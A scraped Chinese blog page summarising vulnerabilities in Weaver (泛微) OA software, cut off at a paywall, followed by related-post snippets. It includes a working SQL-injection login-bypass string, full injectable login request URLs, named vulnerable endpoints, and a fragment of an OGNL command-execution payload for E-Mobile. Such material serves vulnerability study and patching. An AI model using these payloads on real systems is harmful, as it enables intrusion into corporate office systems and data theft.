软件漏洞-泛微OA-汇总

最新推荐文章于 2024-10-01 15:20:30 发布
最新推荐文章于 2024-10-01 15:20:30 发布
阅读量3.3k 收藏 1
点赞数
文章标签: 数据库 php 运维
原文链接:http://www.cnblogs.com/AtesetEnginner/p/11558469.html
版权
本文详细分析了泛微OA系统的多个安全漏洞,包括前台和后台的SQL注入问题,未授权访问页面,任意文件下载,数据库操作,系统越权修改用户信息以及敏感文件泄露和路径遍历等风险。通过对链接的篡改和抓包,揭示了系统潜在的安全隐患。
摘要由CSDN通过智能技术生成

SQL注入

前台SQL注入

用户名:admin' or password like 'c4ca4238a0b923820dcc509a6f75849b' and 'a'='a

密码: 1

验证页面参数 - loginid

(1)/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.jsp%3FtemplateId%3D41%26logintype%3D1%26gopage%3D&logintype=1&fontName=%CE%A2%C8%ED%D1%C5%BA%DA&message=&gopage=&formmethod=get&rnd=&serial=&username=&isie=false&loginid=test&userpassword=11111111111&tokenAuthKey=&islanguid=7&submit=

(2)/login/VerifyLogin.jsp?loginfile=%2Flogin%2Flogin.jsp%2F%3FtemplateId%3D11%26logintype%3D1%26gopage%3D&logintype=1&fontName=%CE%A2%C8%ED%D1%C5%BA%DA&message=&gopage=&formmethod=post&rnd=&serial=&username=&isie=false&loginid=test&userpassword=1111111111111&tokenAuthKey=&islanguid=7&submit= 

未授权访问页面

//services/   存在注入

/ws/   存在注入

(3)

/weaver/weaver.file.SignatureDownLoad?markId=1  --参数markld

后台SQL注入

(1)

首先用使用测试账户

最低0.47元/天 解锁文章
weixin_30855099
关注
泛微E-Office任意文件上传漏洞复现
0xSec
08-12 2797
泛微E-Office是一款标准化的协同 OA 办公软件泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。泛微e-office 9.5版本源文件/webservice/upload.php接口处存在任意文件上传漏洞,未经身份验证的恶意攻击者可以上传恶意文件,从而获取目标服务器的控制权限。
【1day】泛微e-office OA SQL注入漏洞学习
记录并分享学习安全的知识点..
10-17 511
泛微e-office OA是一种企业级办公自动化(Office Automation)解决方案,由中国的泛微软件(FANWEI)开发和提供。它是一套集成办公、流程管理、协同办公、知识管理等功能于一体的全面办公平台。泛微e-office OA存在SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。
泛微OA-推送数据至第三方系统案例
小松鼠的博客
04-16 1960
OA 系统调用第三方系统或者推送数据至第三方系统。
漏洞复现】泛微OA E-Office do_excel.php 任意文件写入漏洞
最新发布
qq_48368964的博客
10-01 1276
泛微OAE-Ofice do exce.php 口存在任意文件写入漏洞。由于该接口未对上传文件的路径和名称进行有效校验,攻击者可以通过构造特定的请求,将任意文件写入到服务器的指定位置。攻击者利用该漏洞上传恶意文件,如 WebShel 或系统脚本,从而在服务器上执行任意命令,访问敏感数据,甚至完全接管服务器。泛微0-0fice是一款标准化的协同 OA办公软件泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。
泛微最新漏洞汇总----实时更新!!!
yggcwhat
07-31 6700
泛微最新漏洞汇总
泛微Ecology8.0二次开发指导手册
热门推荐
chengxuyuanruhua的博客
06-14 2万+
一、开发准备 Ecology系统说明 ecology8.0文件页面编码为UTF-8 ecology8.0 JDK版本 1.6 ecology8.0 应用服务器为Resin Ecology安装目录说明 • ecology:OA主程序目录 • JDK:Java目录 • Resin:应用服务器的目录 ecology主要目录说明 ecology classbean 存放编译后的CLASS文件 js 系统中...
泛微Ecology9鉴权API说明
泛微二次开发后端知识总结
07-29 8291
用于第三方系统调用OA鉴权接口时做为一个参考。
Ecology8 ecology8流程表单常用js
weixin_42436080的博客
10-10 1599
1、提交验证表单结束日期不能少于开始日期 2、checkbox被选中监听事件,监听checkbox复选框 打开表单首先隐藏行 如果checkbox被选中 显示行 3、表单与后端进行数据交互并回写 jQuery(document).ready(function(){ var reuqestid=jQuery(“input[name=‘requestid’]”).val(); var xmlx...
泛微最新漏洞汇总----实时更新!!,网络安全开发知识体系
2201_75863152的博客
04-11 963
title=“移动管理平台-企业管理”q=0.9!!
2024HW必修高危漏洞集合-v3.0
07-08
- **泛微 OA E-Office uploadify 任意文件上传漏洞**:泛微E-Office系统中的uploadify组件存在文件上传漏洞,攻击者可通过该漏洞上传恶意文件。 ##### 3. 不安全的反序列化漏洞 不安全的反序列化漏洞是指应用程序...
2021 HW 漏洞清单汇总 ( 附 poc )
gjgj的博客
04-23 1万+
2021 HW 漏洞清单汇总 2021.4.8——4.22 披露时间 涉及商家/产品漏洞描述 2021/04/08启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞(历史漏洞) CNVD-2021-17391 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793 2021/04/08禅道项目管理软件11.6禅道 11.6 sql注...
Struts2 的OGNL使用简介
03-17
Struts2 的OGNL使用简介实例 博文链接:https://zmx.iteye.com/blog/553748
泛微emobile
10-17
泛微安卓版手机客户E-mobile下载。
全网最强:泛微漏洞综合检测工具
bobo_patrick的博客
03-27 1640
全网poc最全、误报最少、漏洞利用方式最多的泛微漏洞综合检测工具
泛微移动平台e-mobile漏洞利用的修复方案
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
04-14 5336
泛微移动平台e-mobile漏洞利用的修复方案1. 对产生漏洞模块的传入参数进行有效性检测,对传入的参数进行限定2. 当用户输入限定字符时,立刻转向自定义的错误页,不能使用服务器默认的错误输出方式 3. 对以上标签进行危险字符过滤,禁止('、"、+、%、&、、()、;、and、select等)特殊字符的传入 4. 加密数据库内存储信息 5. 与数据库链接并访问数据时,使用参数化查询方式进行链接访问
漏洞复现】泛微E-Mobile 6.0 client.do存在命令执行漏洞
qq_34780861的博客
04-14 1378
泛微E-Mobile 6.0爆出存在命令执行漏洞的问题。现在已经确认了这个漏洞可以被攻击者利用,在某些情况下,用户的输入可能被直接传递给底层操作系统的命令执行函数,攻击者可以通过在输入中插入特殊字符或命令序列来欺骗应用程序将其作为有效命令来执行,从而获得服务器的命令执行权限。
【1】高危漏洞利用工具 (2023.1.6更新)-- Apt_t00ls
司徒荆的博客
01-09 1707
ATP-tools 增加CNVD-2023-00895 包括:泛微、蓝凌、用友、万户、致远、通达、中间件、安全设备等多个高位漏洞
Apt-t00ls-v0.6!高危漏洞利用工具
潇湘信安的博客
04-15 871
这款工具集成了各种OA系统、中间件、安全设备的高危漏洞利用,文件落地方式、杀软进程对比、反弹shell生成等等功能。
泛微 E-Mobile Ognl 表达式注入
m0_51747642的博客
07-30 4005
泛微OA办公系统是一款协调办公软件泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。 使用bp抓包 发送到重发器更改请求头为POST 一执行下面面的代码就直接执行命令了 message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse...
泛微oa e-cology xxe 漏洞
08-17
泛微OA是一种常见的企业办公自动化系统,而XXE(XML外部实体注入)漏洞是指攻击者通过注入恶意的外部实体来读取或利用系统中的敏感数据。 泛微OA的XXE漏洞是由于系统对外部XML实体的处理不当所导致的。攻击者可以通过构造恶意的XML实体并将其发送给系统,然后利用系统对外部实体的解析不当来读取系统中的文件,包括敏感的配置文件、数据库信息。攻击者还可以通过XXE漏洞发起钓鱼攻击或者是向系统发送恶意的请求来进一步导致系统的安全漏洞。 为了防范泛微OA的XXE漏洞,建议以下几点: 1. 进行安全审计:对泛微OA系统进行定期的安全审计,通过检测系统中的漏洞和弱点,及时修复存在的XXE漏洞。 2. 模板限制:在处理外部XML实体时,应限制或阻止对外部实体的解析,避免可能的XXE攻击。可以通过设置合适的解析选项,限制对外部实体的访问权限。 3. 输入验证与过滤:对于用户输入的数据,应进行合理的验证和过滤,确保输入的内容符合预期格式,避免恶意的外部实体注入。 4. 更新补丁:定期保持泛微OA系统的更新与升级,及时安装官方发布的补丁和修复漏洞的版本。 5. 安全意识培训:加强企业员工的安全意识培训,提高他们对XXE漏洞及其他安全威胁的认识,避免因无意中点击恶意链接或下载恶意附件而导致漏洞的利用。 通过以上措施,可以有效地减少泛微OA中的XXE漏洞,提升系统的安全性。及早识别并修复漏洞,有助于保护企业的机密信息以及防止潜在的安全威胁发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值